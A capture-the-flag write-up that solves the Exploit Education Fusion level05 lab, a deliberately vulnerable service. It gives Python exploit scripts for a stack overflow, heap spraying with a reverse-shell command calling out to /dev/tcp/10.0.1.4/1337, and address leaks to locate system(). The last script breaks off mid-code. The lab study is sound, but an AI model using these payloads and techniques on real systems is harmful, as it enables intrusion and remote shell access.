Exploit Education | Fusion | Level 05 Solution

Even more information leaks and stack overwrites. This time with random libraries / evented programming styles :>

The description and source code can be found here:
http://exploit.education/fusion/level05/

Source Code Analysis

At a high level, this program allows you to connect to the service and register users into a “database” (it’s just a global array variable). It also lets you send the “database” to a remote host, check names to see if they’ve been registered, and see which registered user is “up” on a port that you specify.

childtask()

This function simply handles each of the program’s available commands:

if (strncmp(buffer, "addreg ", 7) == 0) {
    taskcreate(addreg, strdup(buffer + 7), STACK);
    continue;
}

if (strncmp(buffer, "senddb ", 7) == 0) {
    taskcreate(senddb, strdup(buffer + 7), STACK);
    continue;
}

if (strncmp(buffer, "checkname ", 10) == 0) {
    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);
    isa->fd = cfd;
    isa->string = strdup(buffer + 10);
    taskcreate(checkname, isa, STACK);
    continue;
}

if (strncmp(buffer, "quit", 4) == 0) {
    break;
}

if (strncmp(buffer, "isup ", 5) == 0) {
    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);
    isa->fd = cfd;
    isa->string = strdup(buffer + 5);
    taskcreate(isup, isa, STACK);
}

addreg()

This function lets you register users into a “database” by supplying the command, name, flags (as an integer), and IPv4 address.

static void addreg(void *arg) {
    char *name, *sflags, *ipv4, *p;
    int h, flags;
    char *line = (char *)(arg);

    name = line;
    p = strchr(line, ' ');
    if (! p) goto bail;
    *p++ = 0;
    sflags = p;
    p = strchr(p, ' ');
    if (! p) goto bail;
    *p++ = 0;
    ipv4 = p;

    flags = atoi(sflags);
    if (flags & ~0xe0) goto bail;

    h = hash(name, strlen(name), REGDB-1);
    registrations[h].flags = flags;
    registrations[h].ipv4 = inet_addr(ipv4);

    printf("registration added successfully\n");

bail:
    free(line);
}

The program performs a check on the “flag” integer you supply. It quits and nothing happens if you don’t supply one of the following values: 0, 32, 64, 96, 128, 160, 192, 224. There doesn’t seem to be any reason for this and the flag integer doesn’t seem to be used in any meaningful way.

The name supplied is “hashed” with their own custom 7-bit hashing algorithm. That hash is then used as the index for where to save the flags and IPv4 address in the registrations[] array.

An example of using the addreg command:

andrew ~ $ nc fusion 20005
addreg Andrew 32 10.0.1.4

senddb()

This function has an overflow vulnerability that I will later realize isn’t necessary for exploiting this program. So feel free to skip this section entirely. However, I’ll leave it in for shits & giggles…

static void senddb(void *arg) {
    unsigned char buffer[512], *p;
    char *host, *l;
    char *line = (char *)(arg);
    int port;
    int fd;
    int i;
    int sz;

    p = buffer;
    sz = sizeof(buffer);
    host = line;
    l = strchr(line, ' ');
    if (! l) goto bail;
    *l++ = 0;
    port = atoi(l);
    if (port == 0) goto bail;

    printf("sending db\n");

    if ((fd = netdial(UDP, host, port)) < 0) goto bail;

    for (sz = 0, p = buffer, i = 0; i < REGDB; i++) {
        if (registrations[i].flags | registrations[i].ipv4) {
            memcpy(p, &registrations[i], sizeof(struct registrations));
            p += sizeof(struct registrations);
            sz += sizeof(struct registrations);
        }
    }
bail:
    fdwrite(fd, buffer, sz);
    close(fd);
    free(line);
}

The for loop will copy the data from each element of the registrations[] array into the buffer[512] array. The registrations[] array is capable of holding up to 128 elements of the registrations struct, which was defined globally earlier:

struct registrations {
    short int flags;
    in_addr_t ipv4;
} __attribute__((packed));

#define REGDB (128)
struct registrations registrations[REGDB];

Since the struct was given the packed attribute, it will only use as much space as needed, which happens to be 6 bytes. Two bytes for the short int and 4 for the in_addr_t. A little math will tell us that the filling the registrations[] array will take 768 bytes (6 * 128). That’s 256 bytes more than the buffer[512] array.

I wrote a short script as a proof of concept:

#!/usr/bin/env python3

from pwn import *
import time
import string
import random

def random_string(size):
    return ''.join(random.choice(string.ascii_letters) for x in range(size))

io = remote("fusion", 20005)
local_ip = "10.0.1.4"
local_port = 4444

log.info("Sending 'addreg' commands")
for i in range(170):
    io.sendline(f"addreg {random_string(32)} 32 17.17.17.17")
    time.sleep(0.1)

log.info("Sending 'senddb' command")
senddb = f"senddb {local_ip} {local_port}\n"
io.send(senddb)
io.close()

Running this script from the attacking VM takes about 20 seconds because of the 0.1 second sleep between each command. Without this, I noticed that a bunch of the commands would be bunched into a single packet and the buffer wasn’t being overflown.

andrew ~/level05 $ ./bof.py 
[+] Opening connection to fusion on port 20005: Done
[*] Sending 'addreg' commands
[*] Sending 'senddb' command
[*] Closed connection to fusion port 20005

On the Fusion VM, we can see the segfault in the kernel messages:

fusion@fusion:~$ dmesg
...
[ 2446.051965] level05[1878]: segfault at 20110d ip b764d90e sp b8ff695c error 4 in libc-2.13.so[b75db000+176000]
Hash

I need to have a list of strings I can use for the “name” field and their hashed value. I’ll need to be able to place data in certain places of the overflown buffer. In order to do that, I’ll need to know which index in the registrations[] array I have to work with. I re-wrote the hashing algorithm in a Python script and created a loop to hash a bunch of 2-character strings and print the results.

#!/usr/bin/env python3

import string
import sys


def hash(string):
    mask = 127
    h = 0xfee13117
    max_int = 0xffffffff

    for i in range(len(string)):
        h ^= ord(string[i])
        h += (h << 11)
        h &= max_int
        h ^= (h >> 7)
        h -= ord(string[i])

    h += (h << 3)
    h &= max_int
    h ^= (h >> 10)
    h += (h << 15)
    h &= max_int
    h -= (h >> 17)

    return (h & mask)


if __name__ == "__main__":
    all_chars = string.ascii_letters + string.digits #+ string.punctuation
    for i in range(len(all_chars)):
        for j in range(len(all_chars)):
            string = all_chars[i] + all_chars[j]
            h = hash(string, len(string))
            print(f"{h}\t{string}")

checkname()

There exists another buffer overflow in the get_and_hash() function, which is called by checkname().

int get_and_hash(int maxsz, char *string, char separator) {
    char name[32];
    int i;

    if (maxsz > 32) return 0;
    for (i = 0; i < maxsz, string[i]; i++) {
        if (string[i] == separator) break;
        name[i] = string[i];
    }

    return hash(name, strlen(name), 0x7f);
}

struct isuparg {
    int fd;
    char *string;
};

static void checkname(void *arg) {
    struct isuparg *isa = (struct isuparg *)(arg);
    int h;

    h = get_and_hash(32, isa->string, '@');
    fdprintf(isa->fd, "%s is %sindexed already\n", isa->string, registrations[h].ipv4 ? "" : "not ");
}

The checkname() function takes the string the user supplied after the “checkname ” command and sends it to the get_and_hash() function. It looks like the intention is to loop through each character of that string, save it to the name[32] variable, and stop when either the supplied string ends or it reaches the maximum size of 32.

Except, that’s not how this works. Admittedly, it took me a long time to spot this myself as I’m not a C developer. The comma operator in the for loop says to keep looping whle i is less than maxsz OR while string[i] exists. The comma operator in the for loop returns only the last value of the expression, so it will ignore maxsz and keep looping while string[i] exists.

We can test this out by sending the “checkname” command followed by a string that we know will overflow the buffer and overwrite the saved EIP pointer.

andrew ~/level05 $ python3 -c 'print("checkname " + "A"*50)' | nc fusion 20005
** welcome to level05 **

The dmesg command on the Fusion VM will show that we have full control over the EIP register.

fusion@fusion ~ $ dmesg 
[10664.771069] level05[3230]: segfault at 41414141 ip 41414141 sp b929ebb0 error 14

This, alone, will not do much for us as everything is randomized. Even the addresses of the code is random as it’s a Position Independent Executable. But we’ll see later how this can be used.

Note that the get_and_hash() function does NOT null-terminate the name[] string. Because data is already on the stack, the name passed to the hash() function is rarely the same as what the user submitted. So usually, you’ll get the message that “ is not indexed already” even if it IS indexed already.

isup()

The “isup” command takes 2 arguments (for some reason), almost anything is possible for the first and a valid port number for the second. It simply goes through all the registered “names” in its database and attempts to connect to them via UDP on the port that was specified. If the host is listening on the specified port, then the server sends it part of its registration info.

static void isup(void *arg) {
    unsigned char buffer[512], *p;
    char *host, *l;
    struct isuparg *isa = (struct isuparg *)(arg);
    int port;
    int fd;
    int i;
    int sz;

    // skip over first arg, get port
    l = strchr(isa->string, ' ');
    if (! l) return;
    *l++ = 0;

    port = atoi(l);
    host = malloc(64);

    for (i = 0; i < 128; i++) {
        p = (unsigned char *)(& registrations[i]);
        if (! registrations[i].ipv4) continue;

        sprintf(host, "%d.%d.%d.%d",
            (registrations[i].ipv4 >> 0) & 0xff,
            (registrations[i].ipv4 >> 8) & 0xff,
            (registrations[i].ipv4 >> 16) & 0xff,
            (registrations[i].ipv4 >> 24) & 0xff);

        if ((fd = netdial(UDP, host, port)) < 0) {
            continue;
        }

        buffer[0] = 0xc0;
        memcpy(buffer + 1, p, sizeof(struct registrations));
        buffer[5] = buffer[6] = buffer[7] = 0;

        fdwrite(fd, buffer, 8);
        close(fd);
    }

    free(host);
}

Something important to note is that before the call to isup() (take a look back at the childtask() function), the buffer variable that contains the user-supplied data is put through strdup(), which will allocate space for it on the heap. However, the pointer that’s returned from that never get’s freed.

Exploitation

Heap Spraying

Because memory in the heap is not properly freed after being allocated with the “isup” command, we can fill the heap with our own data. We will then overwrite the isa->fd pointer in the checkname() function and try to get it to point to somewhere in the heap (more on that later). We’ll need to include a string that can get us a reverse shell to pass as an argument to system() as well as the value for the file descriptor, which happens to always be 0x4. That allows the program to send data back to us. Since this is filling a 32 bit integer space, there will be some null bytes involved, which means it’ll need to be at the end of our data.

We’ll need to get an idea for where the heap base address may be and where it could possibly end. The more data we fill the heap with, the better of a chance we’ll have of finding a valid address later. However, we don’t need to fill it up completely, so we’ll try to be smart about it.

Some of the processes had heap space starting with 0x0 instead of 0xb. Our “level05” process (and all the other levels) always start with 0xb:

root ~ # cat /proc/$(pidof level05)/maps 
b7648000-b768a000 rw-p 00000000 00:00 0 
b768a000-b7800000 r-xp 00000000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7800000-b7802000 r--p 00176000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7802000-b7803000 rw-p 00178000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7803000-b7806000 rw-p 00000000 00:00 0 
b7810000-b7812000 rw-p 00000000 00:00 0 
b7812000-b7813000 r-xp 00000000 00:00 0          [vdso]
b7813000-b7831000 r-xp 00000000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7831000-b7832000 r--p 0001d000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7832000-b7833000 rw-p 0001e000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7833000-b7839000 r-xp 00000000 07:00 75280      /opt/fusion/bin/level05
b7839000-b783a000 rw-p 00006000 07:00 75280      /opt/fusion/bin/level05
b783a000-b783d000 rw-p 00000000 00:00 0 
b9270000-b9291000 rw-p 00000000 00:00 0          [heap]
bfb7d000-bfb9e000 rw-p 00000000 00:00 0          [stack]

Let’s look at the heap space addresses for the various processes on the Fusion VM:

root ~ # cat /proc/*/maps | grep heap | grep ^b | sort
b7815000-b7836000 rw-p 00000000 00:00 0          [heap]
b7b7c000-b7b9d000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7da7000 rw-p 00000000 00:00 0          [heap]
b7e4c000-b7e6d000 rw-p 00000000 00:00 0          [heap]
b7e90000-b7ed7000 rw-p 00000000 00:00 0          [heap]
b82b7000-b82d8000 rw-p 00000000 00:00 0          [heap]
b8336000-b8357000 rw-p 00000000 00:00 0          [heap]
b837f000-b83a0000 rw-p 00000000 00:00 0          [heap]
b8ae1000-b8b44000 rw-p 00000000 00:00 0          [heap]
b8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]
b8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]
b8e32000-b8e53000 rw-p 00000000 00:00 0          [heap]
b9270000-b9291000 rw-p 00000000 00:00 0          [heap]
b9647000-b9668000 rw-p 00000000 00:00 0          [heap]

We can see that it generally ranges between 0xb7815000 and 0xb9668000 (lowest address to highest address), the difference of which is 0x1e53000. That’s 31,797,248 in decimal. The childtask() function stores each command into a buffer with a maximum size of 512 bytes. In addition, you’ll see later that another 16 bytes of heap space is taken up to store the file descriptor each time. This means we’d need to send the “isup” command (the one we’re using for heap spraying) 60,222 times (31,797,248 ÷ (512 + 16)). Let’s take a look at what the heap looks like when we send data. FIrst, I’ll attach to the “level05” process from the Fusion VM using gdbserver:

root ~ # gdbserver --attach :1234 $(pidof level05)
Attached; pid = 4819
Listening on port 1234

Then I’ll connect to it from GDB on my attacking VM (note that I copied the level05 binary to my attacking machine so that I could have GDB read the symbols):

andrew ~/level05 $ gdb
GEF for linux ready, type `gef' to start, `gef config' to configure
92 commands loaded for GDB 9.2 using Python engine 3.8

gef➤  file level05
Reading symbols from level05...

gef➤  target remote 10.0.1.5:1234
Remote debugging using 10.0.1.5:1234
...

gef➤  c
Continuing.

Now I’ll send some data:

andrew ~/level05 $ echo "isup $(pwn cyclic 512)" | nc fusion 20005
** welcome to level05 **

And check the heap:

^C
Program received signal SIGINT, Interrupt.
...
gef➤  heap chunks
Chunk(addr=0xb91fd008, size=0x108, flags=PREV_INUSE)
    [0xb91fd008     08 b0 5c b7 10 d1 1f b9 b0 54 20 b9 60 da 20 b9    ..\......T .`. .]
Chunk(addr=0xb91fd110, size=0x83a0, flags=PREV_INUSE)
    [0xb91fd110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb92054b0, size=0x83a0, flags=PREV_INUSE)
    [0xb92054b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0xb920d850, size=0x10, flags=PREV_INUSE)
    [0xb920d850     04 00 00 00 60 d8 20 b9 00 00 00 00 01 02 00 00    ....`. .........]
Chunk(addr=0xb920d860, size=0x200, flags=PREV_INUSE)
    [0xb920d860     61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61    aaaabaaacaaadaaa]
Chunk(addr=0xb920da60, size=0x105a8, flags=PREV_INUSE)  ←  top chunk

gef➤  x/128wx 0xb920d860
0xb920d860:	0x61616161	0x61616162	0x61616163	0x61616164
0xb920d870:	0x61616165	0x61616166	0x61616167	0x61616168
0xb920d880:	0x61616169	0x6161616a	0x6161616b	0x6161616c
0xb920d890:	0x6161616d	0x6161616e	0x6161616f	0x61616170
0xb920d8a0:	0x61616171	0x61616172	0x61616173	0x61616174
0xb920d8b0:	0x61616175	0x61616176	0x61616177	0x61616178
0xb920d8c0:	0x61616179	0x6261617a	0x62616162	0x62616163
0xb920d8d0:	0x62616164	0x62616165	0x62616166	0x62616167
0xb920d8e0:	0x62616168	0x62616169	0x6261616a	0x6261616b
0xb920d8f0:	0x6261616c	0x6261616d	0x6261616e	0x6261616f
0xb920d900:	0x62616170	0x62616171	0x62616172	0x62616173
0xb920d910:	0x62616174	0x62616175	0x62616176	0x62616177
0xb920d920:	0x62616178	0x62616179	0x6361617a	0x63616162
0xb920d930:	0x63616163	0x63616164	0x63616165	0x63616166
0xb920d940:	0x63616167	0x63616168	0x63616169	0x6361616a
0xb920d950:	0x6361616b	0x6361616c	0x6361616d	0x6361616e
0xb920d960:	0x6361616f	0x63616170	0x63616171	0x63616172
0xb920d970:	0x63616173	0x63616174	0x63616175	0x63616176
0xb920d980:	0x63616177	0x63616178	0x63616179	0x6461617a
0xb920d990:	0x64616162	0x64616163	0x64616164	0x64616165
0xb920d9a0:	0x64616166	0x64616167	0x64616168	0x64616169
0xb920d9b0:	0x6461616a	0x6461616b	0x6461616c	0x6461616d
0xb920d9c0:	0x6461616e	0x6461616f	0x64616170	0x64616171
0xb920d9d0:	0x64616172	0x64616173	0x64616174	0x64616175
0xb920d9e0:	0x64616176	0x64616177	0x64616178	0x64616179
0xb920d9f0:	0x6561617a	0x65616162	0x65616163	0x65616164
0xb920da00:	0x65616165	0x65616166	0x65616167	0x65616168
0xb920da10:	0x65616169	0x6561616a	0x6561616b	0x6561616c
0xb920da20:	0x6561616d	0x6561616e	0x6561616f	0x65616170
0xb920da30:	0x65616171	0x65616172	0x65616173	0x65616174
0xb920da40:	0x65616175	0x65616176	0x65616177	0x65616178
0xb920da50:	0x65616179	0x6661617a	0x00616162	0x000105a9

The last full word value here (without a space) is 0x6661617a. We’ll find the offset of that and add our 0x4 value afterward in the heap spray script:

andrew ~/level05 $ pwn cyclic -l 0x6661617a
500

That means we can put 504 characters of padding (the 500 number does not include the 4 characters of the last full word value) in the buffer before our file descriptor value. Here’s a script I came up with for spraying the heap:

#!/usr/bin/env python3

from pwn import *
from time import sleep


buff_sz = 504
command  = b"isup "
content  = b"ABC "
content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes
content += b"A" * (buff_sz - len(content))
content += pack(4)

io = remote("fusion", 20005)
log.info(io.recvline())

max_spray = 60222
with log.progress('Spraying') as p:
    for i in range(max_spray):
        io.send(command + content)
        p.status(f"{(i/max_spray):.2%}")
        sleep(0.005)

A couple of notes:

  • The “content” variable starts with “ABC ” because the first space in our content will get turned into a null byte. We can’t have that happen in the middle of our reverse shell string. Also I needed a unique value, like “ABC”, later on when I’m checking the returned data.
  • I need to add that small sleep value because without it, some of the requests get lumped together into a single packet. If that happens, only the first request is valid and the rest are ignored.

Running the script takes about 8 minutes:

andrew ~/level05 $ time ./3_spray.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[+] Spraying: Done
 
real    8m17.777s
user    0m21.451s
sys     1m28.634s

Leaking the File Descriptor

Now that we’ve got the heap filled with data, we can look at the addresses there and try to find a pattern to make our address guessing a bit smarter:

gef➤  heap chunks 
Chunk(addr=0xb8759008, size=0x108, flags=PREV_INUSE)
    [0xb8759008     08 b0 60 b7 10 91 75 b8 b0 14 76 b8 70 9c 76 b8    ..`...u...v.p.v.]
Chunk(addr=0xb8759110, size=0x83a0, flags=PREV_INUSE)
    [0xb8759110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb87614b0, size=0x83a0, flags=PREV_INUSE)
    [0xb87614b0     30 64 7c b7 30 64 7c b7 00 00 00 00 00 00 00 00    0d|.0d|.........]
Chunk(addr=0xb8769850, size=0x10, flags=)
    [0xb8769850     04 00 00 00 60 98 76 b8 00 00 00 00 01 02 00 00    ....`.v.........]
Chunk(addr=0xb8769860, size=0x200, flags=PREV_INUSE)
    [0xb8769860     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA./bin/sh > /d]
Chunk(addr=0xb8769a60, size=0x10, flags=PREV_INUSE)
    [0xb8769a60     04 00 00 00 70 9a 76 b8 00 00 00 00 01 02 00 00    ....p.v.........]
Chunk(addr=0xb8769a70, size=0x200, flags=PREV_INUSE)
    [0xb8769a70     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA./bin/sh > /d]
...

We can see that the address of each chunk is 16-byte aligned and ends with 0.
Let’s look at the contents of a single chunk:

gef➤  x/128wx 0xb8769860
0xb8769860:	0x00414141	0x6e69622f	0x2068732f	0x642f203e
0xb8769870:	0x742f7665	0x312f7063	0x2e302e30	0x2f342e31
0xb8769880:	0x37333331	0x263e3020	0x3e322031	0x203b3126
0xb8769890:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769900:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769910:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769920:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769930:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769940:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769950:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769960:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769970:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769980:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769990:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a00:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a10:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a20:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a30:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a40:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a50:	0x41414141	0x41414141	0x00000004	0x00000011

The file descriptor that we included at the end (0x00000004) will always have an address ending with 8.

Let’s look at the tail end of the disassembly (from Ghidra) for the get_and_hash() function:

000127ab     ADD      ESP, 0x2c
000127ae     POP      ESI
000127af     POP      EDI
000127b0     POP      EBP
000127b1     RET

The stack includes 44 bytes (0x2c) of space, followed by saved values for the ESI, EDI, EBP, and EIP registers. Once execution is returned to the checkname() function, a few things happen but we’ll see what happens to the value in the ESI register before fdprintf() is called:

0001282b     MOV      EAX, dword ptr [ESI]
0001282d     MOV      dword ptr [ESP], EAX
00012830     CALL     fdprintf

It gets saved to the top of the stack as the first argument to fdprintf(). This tells us that it’s the pointer to the file descriptor.

Now, I’ll write a script to find a valid file descriptor address in our heap space.

#!/usr/bin/env python3

from pwn import *
import sys

start_addr = 0xb9700108
content  = b"checkname "
content += b"A" * 32

io = remote("fusion", 20005)
log.info(io.recvline())
log.info("Sending 'checkname' commands")

for addr in range(start_addr, start_addr+528, 16):
    io.sendline(content + p32(addr))
    data = io.recvline(timeout=0.1)

    if b"indexed already" in data:
        log.success(f"Found address = {addr:#010x}")
        log.info(f"Reverse shell string should be at {addr+28:#010x}")
        sys.exit()

log.warning("File descriptor address not found!")

Choosing the address to start guessing with (line 8) can be tricky. If it’s outside the heap and it’s an invalid address, the program will crash and we’ll need to start over again by spraying the heap. I chose that starting address (0xb9700108) because I looked at all the heap starting addresses for the other processes on the system and didn’t see any that start above that, so it should be safe. I also know that with the amount of data we’re spraying the heap with, it’s not too high to go above the allocated heap space. AND I know that the file descriptor address will always end with 8.

You can see that the for loop will only run through 33 times (528 ÷ 16). That should be the maximum number of guesses needed to find the file descriptor.

andrew ~/level05 $ ./leak_fd.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Sending 'checkname' commands
[+] File descriptor address = 0xb9700208
[*] Reverse shell string should be at 0xb9700224

Leaking a Libc Address

The goal here is to call the system() function from libc and pass it a pointer to our reverse shell string. In order to get this address, we would normally leak it’s address from the .got.plt section. This is how the program knows where the various libc (and other shared libraries) functions are stored at. However, the system() function is never called in this binary, so it is not mapped in the .got.plt section. We’ll need to leak another function’s address and calculate the offset from that to system(). In this case, I’ll be leaking the write() function’s address.

First, I’m going to find the system() and write() offsets:

# readelf -s /lib/i386-linux-gnu/libc-2.13.so | grep -E ' system@| write@'
  1409: 0003cb20   139 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
  2247: 000c12c0   128 FUNC    WEAK   DEFAULT   12 write@@GLIBC_2.0

A little hex math tells us that 0xc12c0 – 0x3cb20 = 0x847a0. So, whichever address we find for write(), we just need to subtract 0x847a0 from it in order to get the system() function address.

The only reason this exploit will work is because the heap contains a few addresses to functions in our code, presumably because the chunk is not properly free’d. Let’s look for those. The steps I’m taking here:

  1. Print the address of the childtask() function
  2. Search for that address in memory
  3. Show the heap chunks (NOTE: If you do this after spraying the heap, it will take a LONG time and try to display ALL of the chunks. Hit Ctrl+C immediately after using the heap chunks command to get just the first few.)
  4. Get the difference of the address of the start of my heap spraying and the childtask() pointer location
  5. Divide that difference by 4
  6. Use the dereference command to show the last 34 word values of that large chunk before our heap spraying
gef➤  p childtask
$1 = {void (void *)} 0xb78d9c70 <childtask>

gef➤  search-pattern 0xb78d9c70
[+] Searching '\x70\x9c\x8d\xb7' in memory
[+] In (0xb76ed000-0xb772f000), permission=rw-
  0xb772d130 - 0xb772d140  →   "\x70\x9c\x8d\xb7[...]" 
[+] In '[heap]'(0xb8c14000-0xb8c35000), permission=rw-
  0xb8c1c6ec - 0xb8c1c6fc  →   "\x70\x9c\x8d\xb7[...]" 
  0xb8c1c840 - 0xb8c1c850  →   "\x70\x9c\x8d\xb7[...]" 
  0xb8c247c8 - 0xb8c247d8  →   "\x70\x9c\x8d\xb7[...]" 

gef➤  heap chunks 
Chunk(addr=0xb8c14008, size=0x108, flags=PREV_INUSE)
    [0xb8c14008     08 d0 6e b7 10 41 c1 b8 b0 c4 c1 b8 a0 4e c2 b8    ..n..A.......N..]
Chunk(addr=0xb8c14110, size=0x83a0, flags=PREV_INUSE)
    [0xb8c14110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb8c1c4b0, size=0x83a0, flags=PREV_INUSE)
    [0xb8c1c4b0     98 4e c2 b8 30 84 8a b7 00 00 00 00 00 00 00 00    .N..0...........]
Chunk(addr=0xb8c24850, size=0x10, flags=)
    [0xb8c24850     04 00 00 00 60 48 c2 b8 00 00 00 00 01 02 00 00    ....`H..........]
Chunk(addr=0xb8c24860, size=0x200, flags=PREV_INUSE)
    [0xb8c24860     41 42 43 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    ABC./bin/sh > /d]
...

gef➤  p/d 0xb8c24850 - 0xb8c247c8
$2 = 136

gef➤  p/d 136 / 4
$3 = 34

gef➤  dereference 0xb8c247c8 34
0xb8c247c8│+0x0000: 0xb78d9c70  →  <childtask+0> push ebp
0xb8c247cc│+0x0004: 0xb8c1c72c  →  0x00000000
0xb8c247d0│+0x0008: 0xb78e160c  →  0x00000000
0xb8c247d4│+0x000c: 0xb776c629  →  <swapcontext+89> pop ebx
0xb8c247d8│+0x0010: 0x00000002
0xb8c247dc│+0x0014: 0xb78dc349  →  <taskswitch+41> test eax, eax
0xb8c247e0│+0x0018: 0xb8c1c6c0  →  0x00000000
0xb8c247e4│+0x001c: 0xb78e15a0  →  0x00000000
0xb8c247e8│+0x0020: 0x00000000
0xb8c247ec│+0x0024: 0x00000000
0xb8c247f0│+0x0028: 0x00000000
0xb8c247f4│+0x002c: 0x00000000
0xb8c247f8│+0x0030: 0xb78dc380  →  <taskstart+0> sub esp, 0x1c
0xb8c247fc│+0x0034: 0xb776c5ab  →  <makecontext+75> lea esp, [esp+ebx*4]
0xb8c24800│+0x0038: 0x00000000
0xb8c24804│+0x003c: 0x00000000
...

You can see there’s a couple of other function addresses in here, there’s no particular reason to use childtask() over the others.

Next, I’ll need to find the offset of the wite@got.plt location from where the pointer to childtask() is. I’ll first ask GDB to print the address of write() in libc and search memory for that address. This will be the location in the .got.plt section that stores its location. Then we just subtract the location of childtask() from the write() address stored in .got.plt to find the offset. We can use this offset because the heap contains a pointer to childtask() and is always at the same location (near the beginning of the heap):

gef➤  p write
$1 = {<text variable, no debug info>} 0xb76382c0 <write>

gef➤  search-pattern 0xb76382c0
[+] Searching '\xc0\x82\x63\xb7' in memory
[+] In '/opt/fusion/bin/level05'(0xb7726000-0xb7727000), permission=rw-
  0xb77261a8 - 0xb77261b8  →   "\xc0\x82\x63\xb7[...]" 

gef➤  p childtask
$2 = {void (void *)} 0xb7721c70 <childtask>

gef➤  p 0xb77261a8 - 0xb7721c70
$3 = 0x4538

This offset value will be the same each time the program is loaded into memory.

In summary, we’ll need to:

  1. Find childtask() pointer stored in the heap
  2. Find the write() function address stored in the .got.plt section
  3. Calculate the address to system()

Here’s the script I wrote to find the childtask() pointer in the heap and display the required addresses.

#!/usr/bin/env python3

from pwn import *
import time
import sys

##################
FD = 0xb97001b0  # Use the address found from leaking the file descriptor
##################
bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
content  = b"checkname "
content += b"A" * 32
align = 0x860
#context.log_level = 'DEBUG'


def send(read_ptr):
    payload  = content
    payload += p32(FD)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)


def bad(addr):
    if any(bad in p32(addr) for bad in bad_chars):
        return True
    else:
        return False


if bad(FD):
    log.error("File descriptor address contains a bad byte.")

io = remote("fusion", 20005)
log.info(io.recvline())
read = ((FD - align - 1) & 0xfffff000) + align
# Keep track of when the previous address contained a bad byte
prev_bad = False
log.info("Searching...")

while read > 0xb7000000:
    if bad(read):
        #log.failure(f"Bad byte found in address {read:#010x}")
        prev_bad = True
        read -= 0x1000
        continue

    time.sleep(0.005)
    data = send(read)

    if not data:
        log.error("No data received. Either the program crashed or you have a bad file descriptor address.")

    elif data[:3] == b"ABC":
        prev_inuse = send(read - 24)

        if prev_inuse[:2] == b"\xa0\x83":
            # childtask() ptr offset from start of user-supplied heap = -136 bytes
            childtask_str = send(read - 136)
            childtask = unpack(childtask_str[:4])
            write_str = send(childtask + 0x4538)
            write_addr = unpack(write_str[:4])
            log.info(f"Last address read: {read-136:#010x}")
            log.success(f"Found address to childtask(): {childtask:#010x}")
            log.success(f"   The write@got.plt address: {(childtask+0x4538):#010x}")
            log.success(f"   The address to write() is: {write_addr:#010x}")
            log.success(f"  The address to system() is: {(write_addr-0x847a0):#010x}")
            break

    elif data == b" is not indexed already\n" and prev_bad:
        log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                    "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it."
                    "It is recommended to crash the program so you can start over.")
        log.warning("NOTE: You will need to spray the heap again")
        crash = input("Crash the program? [Y/n] ")

        if crash.lower() == "n":
            log.failure("Exiting")
            sys.exit(1)
        else:
